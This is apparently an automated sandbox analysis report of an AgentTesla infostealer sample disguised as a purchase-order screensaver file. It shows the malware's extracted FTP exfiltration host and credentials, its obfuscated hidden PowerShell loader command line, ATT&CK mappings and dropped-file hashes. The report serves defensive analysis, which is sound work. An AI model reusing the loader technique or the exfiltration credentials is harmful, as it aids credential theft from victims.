agenttesla | d73f8f8dc88a35ebc1a1876433c6daa4f8cb40b5b34c3e2aed3343831438b9e6

Analysis

max time kernel
145s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 11:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO19223403.scr
Size

1019KB
MD5

1310b0c86f99ed198cfd1802cfabe1e6
SHA1

f9da789a0e49f7f0332c21e65f3f9fb746cfb82a
SHA256

bbdb2beee29b5cd7d145cf722ef633432ce5c229a9eba8048eb747e4fc10d5bb
SHA512

076eb43fc662d8a27a5528407bd9f42d93e916034cfd13d10c32c3e98573571fd232a26d04ac0a8f991f0d33361a532e2bb24f7b1752ee9c2abd5f47a13603a5
SSDEEP

24576:+sEChyXOAaCr9Ar9ssls+qRMcePSu41y4I7c9Ek+dv/h9Q8UnSBtv4YyU06:+mIimAJnsvp2IA/+x+d/ha8USBVf

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.hardblack-architects.co.za
Port:
21
Username:
[email protected]
Password:
computer22@

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Loads dropped DLL 2 IoCs

pid	Process
3472	PO19223403.scr
2572	Netherlandic.scr

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	api.ipify.org
27	ip-api.com
25	api.ipify.org

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\redressment\Drnke60.und	PO19223403.scr
File created	C:\Windows\SysWOW64\Computing116\Gedeosten154.lnk	PO19223403.scr

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2572	Netherlandic.scr

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4968	powershell.exe
2572	Netherlandic.scr

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4968 set thread context of 2572	4968	powershell.exe	94

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\entrada\phiallike.Dis	PO19223403.scr

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\resources\udtrkkene\andalusisk.lnk	PO19223403.scr

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
2572	Netherlandic.scr
2572	Netherlandic.scr

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4968	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	2572	Netherlandic.scr

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2572	Netherlandic.scr

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3472 wrote to memory of 4968	3472	PO19223403.scr	85
PID 3472 wrote to memory of 4968	3472	PO19223403.scr	85
PID 3472 wrote to memory of 4968	3472	PO19223403.scr	85
PID 4968 wrote to memory of 2572	4968	powershell.exe	94
PID 4968 wrote to memory of 2572	4968	powershell.exe	94
PID 4968 wrote to memory of 2572	4968	powershell.exe	94
PID 4968 wrote to memory of 2572	4968	powershell.exe	94
PID 4968 wrote to memory of 2572	4968	powershell.exe	94

C:\Users\Admin\AppData\Local\Temp\PO19223403.scr
"C:\Users\Admin\AppData\Local\Temp\PO19223403.scr" /S
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Glandless=Get-Content 'C:\Users\Admin\AppData\Roaming\stress\Pointment\Kreditgivninger\Campanulous\Blaamejses.Hov';$Concurrences=$Glandless.SubString(54160,3);.$Concurrences($Glandless)"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Users\Admin\AppData\Local\Temp\Netherlandic.scr
    "C:\Users\Admin\AppData\Local\Temp\Netherlandic.scr"
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Netherlandic.scr

Filesize
1019KB

MD5
1310b0c86f99ed198cfd1802cfabe1e6

SHA1
f9da789a0e49f7f0332c21e65f3f9fb746cfb82a

SHA256
bbdb2beee29b5cd7d145cf722ef633432ce5c229a9eba8048eb747e4fc10d5bb

SHA512
076eb43fc662d8a27a5528407bd9f42d93e916034cfd13d10c32c3e98573571fd232a26d04ac0a8f991f0d33361a532e2bb24f7b1752ee9c2abd5f47a13603a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a0lho2hb.2t1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsq49CB.tmp\nsExec.dll

Filesize
6KB

MD5
c5b9fe538654a5a259cf64c2455c5426

SHA1
db45505fa041af025de53a0580758f3694b9444a

SHA256
7b51372117960e84d6f5eb3a26810cc044ff02283b3d656a0a456b0ab5cb8ea7

SHA512
f0f8a5570c01b16e54f47502e867ffbaf162b44a847c0ffc8062d20e9492114229de5d9d2a836da256fd3f9fb493536bdbf148d5308695b16c0e98d20d8926aa

Download Submit
C:\Users\Admin\AppData\Roaming\stress\Beg\vaskerummets\Incavation\Binocular71\Betrukken.Epi

Filesize
338KB

MD5
32b8cdd3d9f618321fbe26a397b4aea0

SHA1
1942f56105b412781dc7a185f1ff3c3376e28550

SHA256
0629f8138294683f4e131b88b4b5e589feca1d51ac58d76b1ec0aedd881106f0

SHA512
1f37818be5cebca87e863b181e20e5c0689b9fc93dbde789aed388089e2c82673a55dc5c6ca47c537e75101c34dae9219b0a922baa1cce87ef626ff484ae9091

Download Submit
C:\Users\Admin\AppData\Roaming\stress\Pointment\Kreditgivninger\Campanulous\Blaamejses.Hov

Filesize
52KB

MD5
8ff2c638f7da5e382ba3994d4ea5a0b9

SHA1
c59f7e6b5fbdd2d79ec8c590e62f7b84e65c842a

SHA256
838c2ef819f207ca24853cfcb596d83eb0ebb070e0593c999c0eb2f91a3433e1

SHA512
d2084adba9817e3bfd4d09698f110c4ee2ca590864fbdfd7c2f815069df10093e853b80a7c575c4a1127c9f90b507f2df7c6ca371440ca45c984c7f585f54527

Download Submit
memory/2572-55-0x00000000775F1000-0x0000000077711000-memory.dmp

Filesize
1.1MB

Download
memory/2572-54-0x0000000077678000-0x0000000077679000-memory.dmp

Filesize
4KB

Download
memory/2572-73-0x0000000023F80000-0x0000000023F90000-memory.dmp

Filesize
64KB

Download
memory/2572-71-0x0000000074210000-0x00000000749C0000-memory.dmp

Filesize
7.7MB

Download
memory/2572-68-0x0000000025170000-0x000000002517A000-memory.dmp

Filesize
40KB

Download
memory/2572-67-0x0000000024F80000-0x0000000025012000-memory.dmp

Filesize
584KB

Download
memory/2572-66-0x0000000024F30000-0x0000000024F80000-memory.dmp

Filesize
320KB

Download
memory/2572-63-0x00000000004C0000-0x0000000000502000-memory.dmp

Filesize
264KB

Download
memory/2572-65-0x0000000023F80000-0x0000000023F90000-memory.dmp

Filesize
64KB

Download
memory/2572-64-0x0000000074210000-0x00000000749C0000-memory.dmp

Filesize
7.7MB

Download
memory/2572-60-0x00000000775F1000-0x0000000077711000-memory.dmp

Filesize
1.1MB

Download
memory/2572-59-0x00000000004C0000-0x0000000001714000-memory.dmp

Filesize
18.3MB

Download
memory/4968-49-0x0000000074210000-0x00000000749C0000-memory.dmp

Filesize
7.7MB

Download
memory/4968-41-0x00000000076E0000-0x0000000007C84000-memory.dmp

Filesize
5.6MB

Download
memory/4968-18-0x00000000024F0000-0x0000000002526000-memory.dmp

Filesize
216KB

Download
memory/4968-46-0x0000000007380000-0x0000000007384000-memory.dmp

Filesize
16KB

Download
memory/4968-47-0x0000000008990000-0x000000000CA89000-memory.dmp

Filesize
65.0MB

Download
memory/4968-23-0x0000000004E60000-0x0000000004E82000-memory.dmp

Filesize
136KB

Download
memory/4968-50-0x00000000775F1000-0x0000000077711000-memory.dmp

Filesize
1.1MB

Download
memory/4968-20-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/4968-52-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/4968-21-0x0000000004B20000-0x0000000004B30000-memory.dmp

Filesize
64KB

Download
memory/4968-19-0x0000000074210000-0x00000000749C0000-memory.dmp

Filesize
7.7MB

Download
memory/4968-43-0x0000000008310000-0x000000000898A000-memory.dmp

Filesize
6.5MB

Download
memory/4968-40-0x0000000006410000-0x0000000006432000-memory.dmp

Filesize
136KB

Download
memory/4968-62-0x0000000074210000-0x00000000749C0000-memory.dmp

Filesize
7.7MB

Download
memory/4968-39-0x00000000063C0000-0x00000000063DA000-memory.dmp

Filesize
104KB

Download
memory/4968-38-0x0000000006E30000-0x0000000006EC6000-memory.dmp

Filesize
600KB

Download
memory/4968-37-0x0000000005F30000-0x0000000005F7C000-memory.dmp

Filesize
304KB

Download
memory/4968-36-0x0000000005E80000-0x0000000005E9E000-memory.dmp

Filesize
120KB

Download
memory/4968-35-0x00000000058B0000-0x0000000005C04000-memory.dmp

Filesize
3.3MB

Download
memory/4968-22-0x0000000005160000-0x0000000005788000-memory.dmp

Filesize
6.2MB

Download
memory/4968-25-0x0000000005800000-0x0000000005866000-memory.dmp

Filesize
408KB

Download
memory/4968-24-0x0000000005790000-0x00000000057F6000-memory.dmp

Filesize
408KB

Download